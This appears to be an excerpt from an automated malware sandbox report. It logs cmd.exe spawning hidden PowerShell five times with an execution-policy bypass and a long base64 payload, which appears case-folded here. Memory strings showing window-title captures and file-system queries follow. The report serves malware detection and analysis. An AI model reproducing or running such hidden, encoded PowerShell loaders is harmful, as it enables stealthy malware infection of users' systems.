                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [ -- Program Manager -
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [ -- Program Manager --
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpgq
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqly
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [ -- Program Manager -- ]
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager,
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqh
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [ -- Program Manager --THhq0E
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<c
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [ -- Program Manager --LRcq$J
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq0
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqp
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\cq
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [ -- Program Manager -- L&z
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
